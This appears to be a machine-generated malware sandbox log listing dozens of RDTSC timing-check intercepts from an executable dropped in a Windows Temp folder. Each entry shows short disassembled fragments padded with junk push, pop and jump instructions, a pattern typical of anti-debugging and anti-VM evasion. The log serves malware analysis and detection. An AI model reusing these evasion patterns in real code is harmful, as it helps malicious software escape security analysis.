Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAD69 second address: 7AAD83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB424542852h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAED4 second address: 7AAF0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 jmp 00007FB4246CBDF6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FB4246CBDE8h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB33D second address: 7AB353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB42454284Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB353 second address: 7AB358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB358 second address: 7AB39E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB424542852h 0x00000008 jbe 00007FB424542846h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB424542858h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d jno 00007FB424542846h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B36B8 second address: 7B36C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDEDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B196D second address: 7B1975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1975 second address: 7B19A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB4246CBDF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b jne 00007FB4246CBDECh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1ADE second address: 7B1AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1AE4 second address: 7B1AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1AE8 second address: 7B1AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1C2A second address: 7B1C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1F23 second address: 7B1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2199 second address: 7B219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B26E3 second address: 7B2702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FB424542854h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2702 second address: 7B270C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2BED second address: 7B2BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2BF1 second address: 7B2BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B89D6 second address: 7B89F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB42454284Fh 0x00000009 popad 0x0000000a jo 00007FB42454285Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B89F2 second address: 7B8A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDF0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B8A06 second address: 7B8A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB42454284Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B8A20 second address: 7B8A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BA0BC second address: 7BA0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE1E second address: 7BCE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE26 second address: 7BCE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE3C second address: 7BCE42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD6A2 second address: 7BD6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007FB42454284Ch 0x0000000b pop ecx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD6B9 second address: 7BD6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD7F8 second address: 7BD82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB424542859h 0x0000000b jmp 00007FB42454284Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FB424542846h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD82C second address: 7BD83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD9B6 second address: 7BD9DD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB424542861h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C548D second address: 7C5491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C5491 second address: 7C54A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3809 second address: 7C3836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnl 00007FB4246CBDE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB4246CBDF9h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3836 second address: 7C383A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C383A second address: 7C384A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007FB4246CBE15h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CEE second address: 7C3CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CF2 second address: 7C3CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CF8 second address: 7C3CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CFE second address: 7C3D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDECh 0x00000009 jp 00007FB4246CBDE6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3E6B second address: 7C3E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C4535 second address: 7C453C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C453C second address: 7C4542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC634 second address: 7CC657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4246CBDF4h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC657 second address: 7CC663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC663 second address: 7CC669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC669 second address: 7CC66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D951F second address: 7D9523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9523 second address: 7D953B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FB424542846h 0x00000012 jng 00007FB424542846h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D953B second address: 7D9556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9556 second address: 7D955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D955C second address: 7D9585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF6h 0x00000009 jmp 00007FB4246CBDEFh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D911B second address: 7D911F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D911F second address: 7D9128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D927D second address: 7D9293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB424542852h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9293 second address: 7D9297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9297 second address: 7D929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E3E99 second address: 7E3EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FB4246CBDECh 0x0000000b js 00007FB4246CBDE6h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E53E6 second address: 7E53F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB42454284Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E53F2 second address: 7E5404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FB4246CBDE6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E5404 second address: 7E5429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jng 00007FB424542846h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E5429 second address: 7E542D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EAC97 second address: 7EAC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EAC9D second address: 7EACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDF0h 0x00000009 ja 00007FB4246CBDE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACBC second address: 7EACC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB424542846h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACC6 second address: 7EACCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACCC second address: 7EACFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB424542859h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FB424542846h 0x00000016 jns 00007FB424542846h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACFC second address: 7EAD02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F0951 second address: 7F095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jbe 00007FB424542846h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F095E second address: 7F0965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F67EF second address: 7F6814 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB424542853h 0x0000000c jns 00007FB424542846h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6AE8 second address: 7F6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FB4246CBE02h 0x0000000b jmp 00007FB4246CBDF2h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6C61 second address: 7F6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542852h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6DE4 second address: 7F6DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB4246CBDE6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F4B second address: 7F6F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007FB424542848h 0x0000000b jne 00007FB424542848h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FB42454285Dh 0x00000019 jmp 00007FB424542851h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F79 second address: 7F6F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB4246CBDEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F88 second address: 7F6F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FB424542846h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F97 second address: 7F6F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F9F second address: 7F6FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6FA4 second address: 7F6FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB4246CBDE6h 0x00000009 jmp 00007FB4246CBDF1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6FC0 second address: 7F6FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542853h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7130 second address: 7F7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7272 second address: 7F7278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7278 second address: 7F727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F727C second address: 7F7282 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7282 second address: 7F7288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB832 second address: 7FB83A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB98E second address: 7FB99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB4246CBDE6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB99A second address: 7FB99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BD83 second address: 80BDAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF4h 0x00000007 jmp 00007FB4246CBDF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDAB second address: 80BDD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB424542859h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDD4 second address: 80BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
